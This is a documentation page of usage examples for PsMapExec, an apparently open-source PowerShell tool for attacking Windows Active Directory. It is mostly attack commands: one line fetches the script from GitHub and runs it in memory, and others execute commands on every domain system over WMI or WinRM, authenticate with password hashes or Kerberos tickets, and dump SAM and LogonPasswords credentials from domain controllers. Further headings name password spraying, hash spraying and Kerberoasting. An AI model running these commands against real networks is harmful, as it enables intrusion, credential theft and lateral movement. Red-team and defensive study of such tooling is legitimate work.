search
githubEdit

PsMapExec Usage Examples

hashtag
Load directly into memory and execute

IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")

hashtag
Execute WMI commands over all systems in the domain using password authentication

 PsMapExec -Targets all -Method WMI -Username Admin -Password Pass -Command ""net user""

hashtag
Execute WinRM commands over all systems in the domain using hash authentication

PsMapExec -Targets all -Method WinRM -Username Admin -Hash [Hash] -Command ""net user""

hashtag
Check RDP Access against workstations in the domain and using local authentication

PsMapExec -Targets Workstations -Method RDP -Username LocalAdmin -Password Pass -LocalAuth

hashtag
Dump SAM on a single system using SMB and a -ticket for authentication

PsMapExec -Targets DC01.Security.local -Method SMB -Ticket [Base64-Ticket] -Module SAM

hashtag
Check SMB Signing on all domain systems

PsMapExec -Targets All -Method GenRelayList

hashtag
Dump LogonPasswords on all Domain Controllers over WinRM

PsMapExec -Targets DCs -Method WinRM -Username Admin -Password Pass -Module LogonPasswords

hashtag
Use WMI to check current user admin access from systems read from a text file

hashtag
Spray passwords across all accounts in the domain

hashtag
Spray Hashes across all accounts in the domain

hashtag
Spray Hashes across all Domain Admin group users

hashtag
Kerberoast

hashtag
IPMI

PreviousTarget AcquisitionNextMethods

Last updated